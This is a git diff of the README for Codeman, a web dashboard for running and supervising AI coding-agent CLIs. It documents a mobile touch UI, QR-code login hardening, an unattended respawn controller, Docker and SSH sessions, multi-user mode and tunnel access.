@@ -114,14 +183,12 @@ The most responsive AI coding agent experience on any phone. Full xterm.js termi
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-landing-qr.png" alt="Mobile — landing page with QR auth" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-idle.png" alt="Mobile — idle session with keyboard accessory" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-active.png" alt="Mobile — active agent session" width="260"></td>
|
||||
<td align="center" width="40%"><img src="docs/screenshots/mobile-session-keyboard-20260727.png" alt="Mobile — answering an agent's plan prompt with the keyboard accessory bar and Enter button" width="300"></td>
|
||||
<td align="center" width="60%"><img src="docs/screenshots/mobile-toolbar-enter-20260727.png" alt="Mobile toolbar: accessory bar with /init, /clear, clipboard and Esc above the Run, case, stop, Enter, voice and settings controls" width="440"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="center"><em>Landing page with QR auth</em></td>
|
||||
<td align="center"><em>Keyboard accessory bar</em></td>
|
||||
<td align="center"><em>Agent working in real-time</em></td>
|
||||
<td align="center"><em>Answering prompts by touch</em></td>
|
||||
<td align="center"><em>Accessory bar + dedicated Enter button</em></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
@@ -140,6 +207,18 @@ The most responsive AI coding agent experience on any phone. Full xterm.js termi
|
||||
<tr><td>Password typing on phone</td><td><b>QR code scan — instant auth</b></td></tr>
|
||||
</table>
|
||||
|
||||
- **Keyboard accessory bar** — `/init`, `/clear`, `/compact` quick-action buttons above the virtual keyboard; destructive commands require a double-press to confirm, so you never fire one by accident
|
||||
- **Dedicated Enter button** — replays the keypress through the terminal, so text buffered by local echo is flushed first rather than stranded
|
||||
- **Swipe navigation & smart keyboard handling** — swipe left/right to switch sessions; toolbar and terminal shift up when the keyboard opens (`visualViewport` API)
|
||||
- **Built for phones** — safe-area insets for notch and home indicator, 44px touch targets, bottom-sheet case picker, native momentum scrolling
|
||||
|
||||
```bash
|
||||
codeman web --https
|
||||
# Open on your phone: https://<your-ip>:3000
|
||||
```
|
||||
|
||||
> `localhost` works over plain HTTP. Use `--https` when accessing from another device, or use [Tailscale](https://tailscale.com/) (recommended): the installer can set it up for you (choose **Tailscale** at the network-access prompt, or run `bash ~/.codeman/app/install.sh tailscale` on an existing install). That gives you `https://<your-machine>.<tailnet>.ts.net` with a real certificate: private to your tailnet, no password required, and PWA install + push notifications work on your phone.
|
||||
|
||||
### Secure QR Code Authentication
|
||||
|
||||
Typing passwords on a phone keyboard is miserable. Codeman replaces it with **cryptographically secure single-use QR tokens** — scan the code displayed on your desktop and your phone is authenticated instantly.
|
||||
@@ -148,47 +227,81 @@ Each QR encodes a URL containing a 6-character short code that maps to a 256-bit
|
||||
|
||||
The security design addresses all 6 critical QR auth flaws identified in ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) (USENIX Security 2025, which found 47 of the top-100 websites vulnerable): single-use enforcement, short TTL, cryptographic randomness, server-side generation, real-time desktop notification on scan (QRLjacking detection), and IP + User-Agent session binding with manual revocation. Dual-layer rate limiting (per-IP + global) makes brute force infeasible across 62^6 = 56.8 billion possible codes. Full security analysis: [`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
### Touch-Optimized Interface
|
||||
|
||||
- **Keyboard accessory bar** — `/init`, `/clear`, `/compact` quick-action buttons above the virtual keyboard. Destructive commands (`/clear`, `/compact`) require a double-press to confirm — first tap arms the button, second tap executes — so you never fire one by accident on a bumpy commute
|
||||
- **Swipe navigation** — left/right on the terminal to switch sessions (80px threshold, 300ms)
|
||||
- **Smart keyboard handling** — toolbar and terminal shift up when keyboard opens (uses `visualViewport` API with 100px threshold for iOS address bar drift)
|
||||
- **Safe area support** — respects iPhone notch and home indicator via `env(safe-area-inset-*)`
|
||||
- **44px touch targets** — all buttons meet iOS Human Interface Guidelines minimum sizes
|
||||
- **Bottom sheet case picker** — slide-up modal replaces the desktop dropdown
|
||||
- **Native momentum scrolling** — `-webkit-overflow-scrolling: touch` for buttery scroll
|
||||
|
||||
```bash
|
||||
codeman web --https
|
||||
# Open on your phone: https://<your-ip>:3000
|
||||
```
|
||||
|
||||
> `localhost` works over plain HTTP. Use `--https` when accessing from another device, or use [Tailscale](https://tailscale.com/) (recommended) — it provides a private network so you can access `http://<tailscale-ip>:3000` from your phone without TLS certificates.
|
||||
|
||||
---
|
||||
|
||||
## Live Agent Visualization
|
||||
## Using Codeman — A Human's Guide
|
||||
|
||||
Watch background agents work in real-time. Codeman monitors agent activity and displays each agent in a draggable floating window with animated Matrix-style connection lines back to the parent session.
|
||||
A start-to-finish walkthrough for driving Codeman from the browser. If you just installed, this is where to begin.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-spawn.png" alt="Subagent Visualization" width="900">
|
||||
</p>
|
||||
### 1. Launch the server
|
||||
|
||||
- **Floating terminal windows** — draggable, resizable panels for each agent with a live activity log showing every tool call, file read, and progress update as it happens
|
||||
- **Connection lines** — animated green lines linking parent sessions to their child agents, updating in real-time as agents spawn and complete
|
||||
- **Status & model badges** — green (active), yellow (idle), blue (completed) indicators with Haiku/Sonnet/Opus model color coding
|
||||
- **Auto-behavior** — windows auto-open on spawn, auto-minimize on completion, tab badge shows "AGENT" or "AGENTS (n)" count
|
||||
- **Nested agents** — supports 3-level hierarchies (lead session -> teammate agents -> sub-subagents)
|
||||
```bash
|
||||
codeman web # localhost:3000 (loopback only — safe default)
|
||||
codeman web --port 8080 # custom port (or set CODEMAN_PORT)
|
||||
codeman web --https # self-signed TLS (only needed for remote access)
|
||||
codeman web -H 0.0.0.0 # bind LAN — REQUIRES CODEMAN_PASSWORD (see Security)
|
||||
codeman web -d # detach: survives closing the shell (--status, --stop)
|
||||
codeman service install # systemd/launchd service: comes back after reboots
|
||||
```
|
||||
|
||||
**Agent Teams** — first-class support for Claude Code's native multi-agent teams (`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`). `TeamWatcher` polls `~/.claude/teams/`, matches teammates to their lead session, and surfaces them as live subagent windows with **team-aware idle detection** — so the Respawn Controller won't fire while teammates are still working. See [`docs/agent-teams/`](docs/agent-teams/).
|
||||
Open the printed URL. The page is a single dashboard; everything below happens there.
|
||||
|
||||
### 2. Create your first session
|
||||
|
||||
Click **+ New Session** (or **Quick Start**). A session is one AI CLI running in its own tmux-backed terminal. You choose:
|
||||
|
||||
| Field | What it does |
|
||||
| ---------------------------- | ------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Working directory / case** | The folder the agent operates in. A "case" is just a named working dir Codeman remembers. **Add Case** creates one from scratch, links an existing folder, or clones a GitHub repo straight into one (**Clone Repo**). |
|
||||
| **CLI / run mode** | `Claude` (default), `OpenCode`, `Codex`, `Antigravity`, `Gemini`, or `Terminal` (plain shell). |
|
||||
| **Model** | Per-session model (App Settings → Models → New Claude sessions). A soft default — `/model` still works in-session. |
|
||||
| **Effort / Ultracode** | Reasoning effort (`low`–`max`) or `ultracode` for dynamic multi-agent workflows. Switchable anytime with `/effort`. |
|
||||
|
||||
Hit start — Codeman spawns the CLI via a real PTY and streams it to your browser over SSE.
|
||||
|
||||
### 3. Read the dashboard
|
||||
|
||||
- **Tabs (top)** — one per session. `Alt+1`-`9` to jump, `Ctrl+Tab` for next, drag to reorder (tab order syncs across your devices).
|
||||
- **Terminal (center)** — a real `xterm.js` terminal; full TUIs render correctly. Type directly and press **Enter** to send. `Shift+Enter` inserts a newline.
|
||||
- **Side panels** — Respawn, Orchestrator, Cron, Subagents, Settings (toggled from the toolbar).
|
||||
|
||||
### 4. Talk to the agent
|
||||
|
||||
- **Type prompts** straight into the terminal — input is delivered exactly-once even across reconnects (a dropped link never loses or double-sends a prompt).
|
||||
- **Paste or drag-and-drop images** directly into the session.
|
||||
- **Voice input** — `Ctrl+Shift+V` (Deepgram Nova-3, with auto-silence stop).
|
||||
- **Attachments** — register external files/docs and preview Office/PDF inline.
|
||||
|
||||
### 5. Make it autonomous
|
||||
|
||||
| Mode | Use it for | Where |
|
||||
| ---------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------- |
|
||||
| **Respawn** | Long unattended runs — auto-restarts the CLI on idle/limit, with adaptive timing. Presets: `solo-work`, `overnight-autonomous`, … | Respawn tab |
|
||||
| **Orchestrator** | Turn one goal into a phased plan and drive it to completion across agents. | Orchestrator panel |
|
||||
| **Cron** | Saved, named jobs on a schedule (`once`/`interval`/`daily`/`weekly`) that spawn a session and send a prompt when due. | ⏰ Cron button _(opt-in: App Settings → Header & Panels → Scheduling)_ |
|
||||
| **Auto-resume** | Automatically continue after a subscription rate-limit resets. | Respawn tab (top) |
|
||||
|
||||
### 6. Reach it from anywhere
|
||||
|
||||
- **Phone/tablet** — the UI is fully touch-optimized; scan the desktop **QR code** to log in without typing a password.
|
||||
- **Outside your network** — `./scripts/tunnel.sh start` opens a Cloudflare tunnel (set `CODEMAN_PASSWORD` first).
|
||||
- **SSH** — the `sc` chooser attaches to any session from a terminal (`sc` interactive, `sc 2` quick-attach, `sc -l` list).
|
||||
|
||||
### 7. Operate & maintain
|
||||
|
||||
- **App Settings** — model, effort, permission startup mode, theme/skin, notifications, display toggles, per-CLI options, a synced custom display name, and per-device English/Simplified Chinese UI language.
|
||||
- **Run it in the background** — `codeman web -d` detaches from your shell (`--status`, `--stop`); `codeman service install` makes it a systemd user unit / macOS LaunchAgent that survives reboots. Both verify the server actually answers before reporting success, and both refuse to start a second server on one data dir. See [Keep it running in the background](#quick-start---installation).
|
||||
- **Self-update** — git-clone installs update in place from **App Settings → System → Updates**.
|
||||
- **Deploy your own changes** — see [Development](#development).
|
||||
|
||||
> ⚠️ **Safety:** if you're working _inside_ a Codeman-managed session (`echo $CODEMAN_MUX` → `1`), never run `tmux kill-session` / `pkill claude` directly — use the web UI or `./scripts/tmux-manager.sh`.
|
||||
|
||||
---
|
||||
|
||||
## Zero-Lag Input Overlay
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/zerolag-demo.gif" alt="Zerolag Demo — local echo vs server echo side-by-side" width="900">
|
||||
<img src="docs/images/zerolag-demo-20260728.gif" alt="Zerolag demo: instant local echo next to 600ms-2.7s server echo, side by side on two phones" width="900">
|
||||
</p>
|
||||
|
||||
When accessing your coding agent remotely (VPN, Tailscale, SSH tunnel), every keystroke normally takes 200-300ms to round-trip. Codeman implements a **Mosh-inspired local echo system** that makes typing feel instant regardless of latency.
|
||||
@@ -205,6 +318,30 @@ A pixel-perfect DOM overlay inside xterm.js renders keystrokes at 0ms. Backgroun
|
||||
|
||||
---
|
||||
|
||||
## Live Agent Visualization
|
||||
|
||||
Watch background agents work in real-time. Codeman monitors agent activity and displays each agent in a draggable floating window with animated Matrix-style connection lines back to the parent session.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-windows-20260724.png" alt="Subagent Visualization: three parallel Explore agents as floating windows with live tool-call feeds" width="900">
|
||||
</p>
|
||||
|
||||
- **Floating terminal windows** — draggable, resizable panels for each agent with a live activity log showing every tool call, file read, and progress update as it happens
|
||||
- **Connection lines** — animated green lines linking parent sessions to their child agents, updating in real-time as agents spawn and complete
|
||||
- **Status & model badges** — green (active), yellow (idle), blue (completed) indicators with Haiku/Sonnet/Opus model color coding
|
||||
- **Auto-behavior** — windows auto-open on spawn, auto-minimize on completion, tab badge shows "AGENT" or "AGENTS (n)" count
|
||||
- **Nested agents** — supports 3-level hierarchies (lead session -> teammate agents -> sub-subagents)
|
||||
|
||||
Multi-agent Workflow runs ("ultracode") get the same treatment: a floating run window tracks the whole workflow live, with phases, per-agent token counts, and the current tool of every agent:
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ultracode-window-20260724.png" alt="Ultracode workflow visualization: a live run window with per-agent tokens and phases" width="900">
|
||||
</p>
|
||||
|
||||
**Agent Teams** — first-class support for Claude Code's native multi-agent teams (`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`). `TeamWatcher` polls `~/.claude/teams/`, matches teammates to their lead session, and surfaces them as live subagent windows with **team-aware idle detection** — so the Respawn Controller won't fire while teammates are still working. See [`docs/agent-teams/`](docs/agent-teams/).
|
||||
|
||||
---
|
||||
|
||||
## Respawn Controller
|
||||
|
||||
The core of autonomous work. When the agent goes idle, the Respawn Controller detects it, sends a continue prompt, cycles context management commands for fresh context, and resumes — running **24+ hours** completely unattended.
|
||||
@@ -214,7 +351,7 @@ WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE →
|
||||
```
|
||||
|
||||
- **Multi-layer idle detection** — completion messages, AI-powered idle check, output silence, token stability
|
||||
- **Auto-resume on usage limit** *(opt-in, off by default)* — when Claude halts on a subscription limit ("You've hit your limit · resets 3pm"), Codeman parses the reset time, waits it out plus a 2-minute safety buffer, then dismisses the rate-limit dialog and sends `continue` — so an overnight run survives the 5-hour window instead of stalling until morning. Recognizes every Claude Code limit-message format, retries if still limited, survives Codeman restarts, and holds respawn cycles while paused so `/clear` can't wipe the waiting conversation. Enable per session at the top of the Respawn tab
|
||||
- **Auto-resume on usage limit** _(opt-in, off by default)_ — when Claude halts on a subscription limit ("You've hit your limit · resets 3pm"), Codeman parses the reset time, waits it out plus a 2-minute safety buffer, then dismisses the rate-limit dialog and sends `continue` — so an overnight run survives the 5-hour window instead of stalling until morning. Recognizes every Claude Code limit-message format, retries if still limited, survives Codeman restarts, and holds respawn cycles while paused so `/clear` can't wipe the waiting conversation. Enable per session at the top of the Respawn tab
|
||||
- **Circuit breaker** — prevents respawn thrashing when Claude is stuck (CLOSED -> HALF_OPEN -> OPEN states, tracks consecutive no-progress and repeated errors)
|
||||
- **Health scoring** — 0-100 health score with component scores for cycle success, circuit breaker state, iteration progress, and stuck recovery
|
||||
- **Built-in presets** — `solo-work` (3s idle, 60min), `subagent-workflow` (45s, 240min), `team-lead` (90s, 480min), `ralph-todo` (8s, 480min), `overnight-autonomous` (10s, 480min)
|
||||
@@ -231,7 +368,7 @@ Beyond single-session respawn, the **Orchestrator** turns a high-level goal into
|
||||
- **Crash-safe** — full state persists under the `orchestrator` key in `state.json`, so it survives restarts
|
||||
- **Driven from the UI or API** — the Orchestrator panel, or `POST /api/orchestrator/start` → `/approve` → `/status` (10 endpoints)
|
||||
|
||||
> Distinct from Ralph (a single-session autonomous loop): the orchestrator coordinates multi-phase, multi-agent execution. Full design: [`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md).
|
||||
> Full design: [`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md).
|
||||
|
||||
---
|
||||
|
||||
@@ -239,14 +376,18 @@ Beyond single-session respawn, the **Orchestrator** turns a high-level goal into
|
||||
|
||||
Run **20 parallel sessions** with full visibility — real-time xterm.js terminals at 60fps, per-session token and cost tracking, tab-based navigation, and one-click management.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/screenshots/multi-session-dashboard.png" alt="Multi-Session Dashboard" width="800">
|
||||
</p>
|
||||
|
||||
### Persistent Sessions
|
||||
|
||||
Every session runs inside **tmux** — sessions survive server restarts, network drops, and machine sleep. Auto-recovery on startup with dual redundancy. Ghost session discovery finds orphaned tmux sessions. Managed sessions are environment-tagged so the agent won't kill its own session.
|
||||
|
||||
### Session Manager & Command Palette
|
||||
|
||||
`Ctrl/Cmd/Alt+K` opens a fuzzy session palette; **Browse all sessions** opens the Session Manager: one deduped list of everything Codeman knows about (live sessions, past sessions from state and lifecycle history, and Claude transcripts), each row showing its first and most recent prompt.
|
||||
|
||||
- **Pinning**: pin a session to float it to the top of the list. Pinned sessions even survive kill (they demote to a lightweight stopped entry that stays visible and resumable).
|
||||
- **Name retention**: resuming a past session keeps its original name instead of minting a new one.
|
||||
- **Cross-device tab order**: drag-reordered tabs persist server-side, so your ordering follows you from desktop to phone.
|
||||
|
||||
### Hostname-Aware Window Title
|
||||
|
||||
Running Codeman on multiple hosts (laptop, dev box, NAS)? The browser tab title is `codeman:<hostname>` so you can tell which backend each tab points at without clicking in:
|
||||
@@ -260,23 +401,15 @@ The title is templated into the served HTML on first byte, so it's correct from
|
||||
|
||||
### Smart Token Management
|
||||
|
||||
| Threshold | Action | Result |
|
||||
|-----------|--------|--------|
|
||||
| Threshold | Action | Result |
|
||||
| --------------- | --------------- | ---------------------------------- |
|
||||
| **110k tokens** | Auto `/compact` | Context summarized, work continues |
|
||||
| **140k tokens** | Auto `/clear` | Fresh start with `/init` |
|
||||
| **140k tokens** | Auto `/clear` | Fresh start with `/init` |
|
||||
|
||||
### Notifications
|
||||
|
||||
Real-time desktop alerts when sessions need attention — `permission_prompt` and `elicitation_dialog` trigger critical red tab blinks, `idle_prompt` triggers yellow blinks. Click any notification to jump directly to the affected session. Hooks auto-configured per case directory.
|
||||
|
||||
### Ralph / Todo Tracking
|
||||
|
||||
Auto-detects Ralph Loops, `<promise>` tags, TodoWrite progress (`4/9 complete`), and iteration counters (`[5/50]`) with real-time progress rings and elapsed time tracking.
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ralph-tracker-8tasks-44percent.png" alt="Ralph Loop Tracking" width="800">
|
||||
</p>
|
||||
|
||||
### Run Summary
|
||||
|
||||
Click the chart icon on any session tab to see a timeline of everything that happened — respawn cycles, token milestones, auto-compact triggers, idle/working transitions, hook events, errors, and more.
|
||||
@@ -293,18 +426,73 @@ PTY Output → 16ms Server Batch → DEC 2026 Wrap → SSE → Client rAF → xt
|
||||
|
||||
## More Features
|
||||
|
||||
- **Self-update** — git-clone installs under systemd/launchd update in place from **App Settings → Updates**: it detects the latest release, auto-stashes a dirty tree, and streams build progress across the service restart (npm installs report as non-updatable)
|
||||
- **Multi-CLI** — run **Claude Code**, **OpenCode**, or **Codex** per session; env-var prefixes auto-gate (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*`). See [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **Background daemon & service install** — `codeman web -d` runs the server detached with a pidfile, `~/.codeman/web.log`, and verified startup (it polls the server until it answers, so a port clash never reads as success); `codeman service install` writes a systemd user unit (Linux) or LaunchAgent (macOS) with your shell's PATH baked in, so an nvm or Homebrew `node`, `tmux` and `claude` are actually found. Secrets are never written into unit files
|
||||
- **Self-update** — git-clone installs under systemd/launchd update in place from **App Settings → System → Updates**: it detects the latest release, auto-stashes a dirty tree, and streams build progress across the service restart (npm installs report as non-updatable)
|
||||
- **Clone a GitHub repo as a case** — paste a repository URL into **Add Case → Clone Repo** and Codeman clones it into `~/codeman-cases/<name>` and registers it as a normal case, ready to run an agent in. It preflights the URL while you type (tells you whether it can be cloned anonymously and offers the repo's real branches and tags for the optional branch/tag field), fills the case name in from the URL, and lets you pick which CLI the Run button should use. Public repositories over `https://`; Codeman never collects or stores credentials
|
||||
- **Multi-CLI** — run **Claude Code**, **OpenCode**, **Codex**, **Antigravity**, or **Gemini** per session; env-var prefixes auto-gate (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*` vs `ANTIGRAVITY_*` vs `GEMINI_*`/`GOOGLE_*`). See [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **Docker sessions** — run a case inside an isolated, hardened container. One checkbox on **Create New** spins up a container with sensible defaults and starts the agent inside it; multiple sessions share one per-case container; export a container + its workspace to a portable `.tar.gz` to move it to another machine. See [`docs/docker-cases.md`](docs/docker-cases.md)
|
||||
- **Remote SSH sessions** — point a case at another machine and run the agent there inside a durable remote tmux: survives SSH drops, auto-reconnects, and can discover + attach sessions already running on the host. See [`docs/remote-sessions.md`](docs/remote-sessions.md)
|
||||
- **Effort & Ultracode** — set a per-session default effort (`low`–`max`) or enable **ultracode** (dynamic multi-agent workflows). Soft defaults only — switchable anytime with `/effort` in-session. Extended-thinking budget is configurable too
|
||||
- **Voice input** — dictate prompts with Deepgram Nova-3 (Web Speech API fallback): toggle recording, auto-silence stop, live level meter (`Ctrl+Shift+V`)
|
||||
- **Image input** — paste or drag-and-drop images straight into a session
|
||||
- **Gesture control** *(opt-in)* — a MediaPipe hand-tracking overlay to grab/drag session windows and pinch buttons, hands-free. Enable with `CODEMAN_GESTURE=1` + App Settings → Display
|
||||
- **Multi-monitor span** *(macOS)* — one click opens a browser window maximized across all displays, so floating agent/gesture panels can cross the physical seam
|
||||
- **Gesture control** _(opt-in)_ — a MediaPipe hand-tracking overlay to grab/drag session windows and pinch buttons, hands-free. Enable with `CODEMAN_GESTURE=1` + App Settings → Terminal & Input
|
||||
- **Multi-monitor span** _(macOS)_ — one click opens a browser window maximized across all displays, so floating agent/gesture panels can cross the physical seam
|
||||
- **File Viewer button** _(opt-in)_ — a header button that toggles the built-in file browser panel with one tap; enable under App Settings → Header & Panels → Header buttons
|
||||
- **CJK / IME input** — full composition support for Chinese / Japanese / Korean
|
||||
- **OS notifications & hostname-aware titles** — desktop alerts and tab titles are prefixed `codeman:<host>` so multi-host setups stay unambiguous
|
||||
|
||||
---
|
||||
|
||||
## Isolated Docker Sessions
|
||||
|
||||
Run a case inside its own hardened Docker container instead of directly on your host — for security isolation, reproducible toolchains, and one-click portability.
|
||||
|
||||
- **One click** — on **New Case → Create New**, tick **🐳 Run in an isolated Docker container**. Codeman creates the case folder, spins up a container with default settings, and starts the agent inside it. No host/image/network fields to fill in.
|
||||
- **Resource templates** — expand the checkbox for a **Small / Medium / Large / GPU** preset (memory, CPUs, GPU), or set your own. **Disk is elastic** — storage grows as data flows in, no fixed cap.
|
||||
- **Shared per-case container** — many sessions can `docker exec` into the same container; killing one session never tears the container out from under the others.
|
||||
- **Hardened by default** — non-root, `--cap-drop ALL`, `no-new-privileges`, PID/memory caps, never `--privileged` or the docker socket; a **sealed** profile (no host credentials, network off) is one toggle away.
|
||||
- **Seamless auth, isolated credentials** — your host Claude / Codex / Antigravity / Gemini / OpenCode logins work inside the container out of the box: credentials are seeded (copied) in at launch and onboarding/trust prompts are pre-answered, so no login wizard appears. The container keeps its own copies and never writes back to your host credential stores; only conversation transcripts are shared, and exports never capture secrets.
|
||||
- **Move it to another machine** — export a container's whole environment (toolchain + workspace) to a portable `.tar.gz`, `docker load` it on the other side, and import it into a fresh case.
|
||||
- **Durable** — reconnect after a restart lands back in the same live agent; a container stop/reboot resumes the conversation from the bind-mounted transcript.
|
||||
|
||||
Prerequisite: just Docker (or Podman). The agent base image builds itself automatically on first use, with progress streamed to the UI (or pre-build it with `node scripts/build-agent-image.mjs`). Full guide: [`docs/docker-cases.md`](docs/docker-cases.md).
|
||||
|
||||
---
|
||||
|
||||
## Remote SSH Sessions
|
||||
|
||||
Point a case at another machine and run the agent **there**, over SSH, with the same dashboard, mobile UI, and autonomy features. Your laptop is just a window onto a session that lives on the remote host.
|
||||
|
||||
- **Durable by design**: the agent runs inside a dedicated tmux session on the remote host, so a dropped SSH connection, network change, or laptop sleep never kills the run. Reconnecting lands back in the same live conversation.
|
||||
- **Auto-reconnect**: a bounded-backoff watcher notices a dead SSH pane and silently reattaches to the still-running remote session (kill-switch in settings; intentional kills are never revived).
|
||||
- **Discover & attach**: list the `codeman-*` sessions already running on a host (started by that machine's own Codeman, or by another operator) and attach to one. Attached sessions you don't own **detach on tab close, never kill**.
|
||||
- **Shared sessions**: several clients can attach the same remote session at different window sizes without clamping each other; discovery shows a "shared" badge with the client count.
|
||||
- **Injection-safe**: every ssh command line flows through a single shell-escaping builder, and host/path/identity fields are schema-guarded.
|
||||
|
||||
Set it up under **New Case → Remote** (host, user, identity file, optional jump host). Full design: [`docs/remote-sessions.md`](docs/remote-sessions.md).
|
||||
|
||||
---
|
||||
|
||||
## Multi-User Mode (opt-in)
|
||||
|
||||
Share one Codeman with a small trusted team, each person getting their own login and workspace. **Off by default** — without the flag, nothing changes.
|
||||
|
||||
Enable with `codeman web --multiuser` (or `CODEMAN_MULTIUSER=1`). Create the first admin, then manage users from the CLI or the **Users** tab in App Settings:
|
||||
|
||||
```bash
|
||||
codeman users add alice --admin # prompts for a password (or --password-stdin)
|
||||
codeman users add bob # a regular user
|
||||
codeman users list
|
||||
```
|
||||
|
||||
- **Per-user spaces** — each user's cases live under `~/codeman-users/<name>/cases`; sessions, cases, search, and real-time events are scoped to their owner. Admins see everything.
|
||||
- **Individually revocable logins** — named users with scrypt-hashed passwords in `~/.codeman/users.json`; disable, reset (one-time password), or delete an account at any time. Admin actions are audited to `~/.codeman/admin-audit.jsonl`.
|
||||
- **Safer defaults for regular users** — non-admins run Claude in `--permission-mode auto` (Anthropic's classifier-guarded mode); raw shell sessions, cron `launchCommand`, and skip-permissions require an explicit per-user grant.
|
||||
|
||||
> ⚠️ **This separates workspaces; it does not sandbox users from each other.** Every session runs as the same OS account, so a determined user's agent can still reach another user's files. For real isolation, pair users with **Docker cases** or run separate instances under separate OS accounts. See [`docs/multi-user-plan.md`](docs/multi-user-plan.md) and the multi-user section of [`docs/security-architecture.md`](docs/security-architecture.md).
|
||||
|
||||
---
|
||||
|
||||
## Remote Access — Cloudflare Tunnel
|
||||
|
||||
Access Codeman from your phone or any device outside your local network using a free [Cloudflare quick tunnel](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/) — no port forwarding, no DNS, no static IP required.
|
||||
@@ -333,7 +521,7 @@ The script auto-installs a systemd user service on first run. The tunnel URL is
|
||||
systemctl --user enable codeman-tunnel
|
||||
loginctl enable-linger $USER
|
||||
|
||||
# Or via the Codeman web UI: Settings → Tunnel → Toggle On
|
||||
# Or via the Codeman web UI: App Settings → System → Remote access → Cloudflare Tunnel
|
||||
```
|
||||
|
||||
</details>
|
||||
@@ -372,14 +560,14 @@ Every **60 seconds**, the server automatically rotates to a fresh token. The pre
|
||||
|
||||
The design is informed by ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) (USENIX Security 2025), which found 47 of the top-100 websites vulnerable to QR auth attacks due to 6 critical design flaws across 42 CVEs. Codeman addresses all six:
|
||||
|
||||
| USENIX Flaw | Mitigation |
|
||||
|-------------|------------|
|
||||
| **Flaw-1**: Missing single-use enforcement | Token atomically consumed on first scan — replays always fail |
|
||||
| **Flaw-2**: Long-lived tokens | 60s TTL with 90s grace, auto-rotation via timer |
|
||||
| **Flaw-3**: Predictable token generation | `crypto.randomBytes(32)` — 256-bit entropy. Short codes use rejection sampling to eliminate modulo bias |
|
||||
| **Flaw-4**: Client-side token generation | Server-side only — tokens never leave the server until embedded in the QR |
|
||||
| **Flaw-5**: Missing status notification | Desktop toast: *"Device [IP] authenticated via QR (Safari). Not you? [Revoke]"* — real-time QRLjacking detection |
|
||||
| **Flaw-6**: Inadequate session binding | IP + User-Agent stored for audit. Manual session revocation via API. HttpOnly + Secure + SameSite=lax cookies |
|
||||
| USENIX Flaw | Mitigation |
|
||||
| ------------------------------------------ | ---------------------------------------------------------------------------------------------------------------- |
|
||||
| **Flaw-1**: Missing single-use enforcement | Token atomically consumed on first scan — replays always fail |
|
||||
| **Flaw-2**: Long-lived tokens | 60s TTL with 90s grace, auto-rotation via timer |
|
||||
| **Flaw-3**: Predictable token generation | `crypto.randomBytes(32)` — 256-bit entropy. Short codes use rejection sampling to eliminate modulo bias |
|
||||
| **Flaw-4**: Client-side token generation | Server-side only — tokens never leave the server until embedded in the QR |
|
||||
| **Flaw-5**: Missing status notification | Desktop toast: _"Device [IP] authenticated via QR (Safari). Not you? [Revoke]"_ — real-time QRLjacking detection |
|
||||
| **Flaw-6**: Inadequate session binding | IP + User-Agent stored for audit. Manual session revocation via API. HttpOnly + Secure + SameSite=lax cookies |
|
||||
|
||||
#### Timing-Safe Lookup
|
||||
|
||||
@@ -404,23 +592,23 @@ When someone authenticates via QR, the desktop shows a notification toast with t
|
||||
|
||||
#### Threat Coverage
|
||||
|
||||
| Threat | Why it doesn't work |
|
||||
|--------|-------------------|
|
||||
| **QR screenshot shared** | Single-use: consumed on first scan. 60s TTL: expired before the attacker can act. Desktop notification alerts you immediately. |
|
||||
| **Replay attack** | Atomic single-use consumption + 60s TTL. Old URLs always return 401. |
|
||||
| **Cloudflare edge logs** | Short code is an opaque 6-char lookup key, not the real 256-bit token. Single-use means replaying from logs always fails. |
|
||||
| **Brute force** | 56.8 billion combinations, ~2 valid at any time, dual-layer rate limiting blocks well before statistical feasibility. |
|
||||
| **QRLjacking** | 60s rotation forces real-time relay. Desktop toast provides instant detection. Self-hosted single-user context makes phishing implausible. |
|
||||
| **Timing attack** | Hash-based Map lookup — no string comparison timing leak. |
|
||||
| **Session cookie theft** | HttpOnly + Secure + SameSite=lax + 24h TTL. Manual revocation at `POST /api/auth/revoke`. |
|
||||
| Threat | Why it doesn't work |
|
||||
| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| **QR screenshot shared** | Single-use: consumed on first scan. 60s TTL: expired before the attacker can act. Desktop notification alerts you immediately. |
|
||||
| **Replay attack** | Atomic single-use consumption + 60s TTL. Old URLs always return 401. |
|
||||
| **Cloudflare edge logs** | Short code is an opaque 6-char lookup key, not the real 256-bit token. Single-use means replaying from logs always fails. |
|
||||
| **Brute force** | 56.8 billion combinations, ~2 valid at any time, dual-layer rate limiting blocks well before statistical feasibility. |
|
||||
| **QRLjacking** | 60s rotation forces real-time relay. Desktop toast provides instant detection. Self-hosted single-user context makes phishing implausible. |
|
||||
| **Timing attack** | Hash-based Map lookup — no string comparison timing leak. |
|
||||
| **Session cookie theft** | HttpOnly + Secure + SameSite=lax + 24h TTL. Manual revocation at `POST /api/auth/revoke`. |
|
||||
|
||||
#### How It Compares
|
||||
|
||||
| Platform | Model | Comparison |
|
